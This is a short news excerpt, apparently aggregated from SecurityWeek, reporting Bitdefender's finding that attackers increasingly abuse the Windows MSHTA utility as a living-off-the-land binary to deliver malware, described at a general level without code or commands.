"MSHTA is designed to execute HTML application (HTA) files, which are programs written in HTML, VBScript or JavaScript. An HTA file loaded from an offsite server can be manipulated to run VBScript in memory. The local server would only see the activity of a trusted and MS-signed binary, not what is happening in memory. Because of that trust and the continued legitimate use, it would be difficult to block automatically. The result is that invisible malicious code could be introduced, and that code could then download further LOLBIN components ultimately leading to the implementation of dangerous malware."
"MSHTA provides attackers with a built-in, Microsoft-signed utility that can retrieve and execute remote script content during the initial or intermediate stages of an infection chain. Attackers start the process through basic social engineering. Delivering malware One common abuse of MSHTA detected by BitDefender involved the use of the HTA CountLoader t"
"Over the years, legitimate use of MSHTA has declined. Abuse, however, has grown. MSHTA is increasingly used by bad actors as a Living-off-the-Land binary (LOLBIN) to silently deliver a growing range of malware - ranging from commodity stealers and loaders to advanced and persistent malware such as PurpleFox."
"Since the start of this year, BitDefender has detected a dramatic rise in MSHTA-related activity. The firm believes this reflects increased threat actor use rather than renewed administrative adoption."
MSHTA has been included in Windows since 1999 and remains available in current releases, including through Edge IE mode, to preserve backward compatibility. Legitimate use has declined while abuse has increased, with threat actors using MSHTA as a living-off-the-land binary to silently deliver malware. MSHTA executes HTML application files written in HTML, VBScript, or JavaScript. When an HTA is loaded from an offsite server, it can be manipulated to run VBScript in memory, hiding malicious behavior from the local server because only a trusted, Microsoft-signed binary appears. This trust makes automated blocking difficult, enabling invisible malicious code to download additional components and lead to dangerous malware such as PurpleFox. BitDefender reports a dramatic rise in MSHTA-related activity, attributed to increased attacker use rather than renewed administrative adoption.
Read at SecurityWeek
Unable to calculate read time
Collection
[
|
...
]